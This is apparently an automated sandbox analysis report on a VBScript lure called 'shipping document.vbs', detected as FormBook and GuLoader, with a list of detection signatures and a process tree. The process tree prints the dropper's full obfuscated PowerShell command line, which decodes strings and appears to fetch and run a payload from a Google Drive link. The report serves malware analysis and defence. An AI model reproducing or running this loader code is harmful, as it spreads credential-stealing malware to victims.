Windows
Analysis Report
shipping document.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Creates autostart registry keys with suspicious names
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 2920 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- WmiPrvSE.exe (PID: 6332 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
- powershell.exe (PID: 6856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti ) ($Babbittess);}$Usheen=Quillaia ' S.bc M Autoo,ro omzA,uatiP reenlUdspi l emieaM.c ov/Toakt5E thno. Org, 0Kille Het ,r(EgetfW SelviNedru nSt nidva. ieogunvaw Brugsisbje propeNTid sfTAgter S tdta1Scale 0Ma em.Spu .g0Rensn;A ver B,ded WUrpr,iWou ndn Sprn6H ex n4Sub,e ; c.to Az. mexSvine6k evr4 Non. ;Perso Vir uera,tndv Han,:Store 1 horo2F r et1 oeme. opti0Inten )Skerr For krGSept,eS elebc hist kLe,lio As ,r/ Inhe2T ailz0Efter 1.ndos0.eu ro0Overb1B und 0,arav 1Ore,t Ope rFL.udai S prurSto,ve ,traafSlav io,earax . hot/ Udsu1 Eger2 Me. l1Krabd.Sp inu0Maedt ';$Boghold ersker=Qui llaia 'For biUOscilsa dr.seGangw rBevat- h, ldATheurgP i kyeSemid nKrilrt Ly p ';$Fint =Quillaia 'NondihBlo ckt ReintE tmaapInser s Indf:Int er/defo /T pvodFryse rUn aciTil b vSysseeE xecr.Kurs gberr oAdf rdo Loo.gI nconlAf al eGabes. .l otc Ant o SuccmGodhj /TermouMou n.cTermo?m aletefo,gr xNo.cupInc onoCensur. ejebtBarra =apraxd pu lvocohenwH an.knHol b l I.froCas eaaHyr,sdP ol r&Ar,np iTrichdBes tr= Gar,1U nmo oArbej D FugtjLse ad9Univei Po,c8Subba bFilat8 eg ngBrnefDFu ,le7Adspu4 BordvVAr.h dU ockac.a benOGamel_ Samme0Tilt rm PaynAAr b.taF.rreR SkulkxUnmu sSVildfOAn ,ipZSmithj KorrE l,e fISu.pkNU derBNucul5 Burm ';$O bservander nes=Quilla ia ' Gna > Stand ';$U ti=Quillai a 'DialaiM ,ddeePr.de xNonex ';$ Akkumulere de = Quill aia 'Skaff eNar,ocDat amhCathoou ,ali Fanem %MedisaRet sgpAlligpE jersd ,maa aIndsttKom b a Meta%U ,all\ Loen FWagneiTra ktnTys,li PillnGines d forssiso agt El viO ve slFrils lArsh,iRet ran KursgT eksteProku rUnifan Pr ece,eklasU d,ap1Wa,py 1B tte9 De xt.ArikoU outpnAfkal iIdeal Ne, tb&F,rbi&F lamm ozaee Firesc St, chfiguro l ede Illog$ Ulovm ';St andglas249 (Quillaia ' Cent$Am idog .lukl Y,ereogarn ibRetrtaN, nirlUdate: org.nR ech rerekinsPr eapiKonjag He nenMa.e meHogmorSl agte,appan pomeld.sen seEgn,rsIn ,ri=Ndraa( NatucF,jt imKunstd B vre kants/ Un,oc Fic , Yemen$ S tv,AKravek TnneskKomb iuFidusmle jrsuCardil trykkeMinj rAccoueSk rivd doupe Aroma)Pal, o ');Stand glas249 (Q uillaia ' Mask$Admir g R.shlQua rto Unrib S.deaDanse l Fork: Nu mmPReachrG lazef M.ll aValgrbDip htrGenkeiL .viskUnsen eVugger,rn ne=Learn$J ernbFChall iKhevznUds igtSkull. HressWolff p Un,rl Ub ndiStjertM a,ri(Tapet $Do,laORri ngb Ge,ts. nasseAk,us rRvhulvPan oraYnglen RecldFremf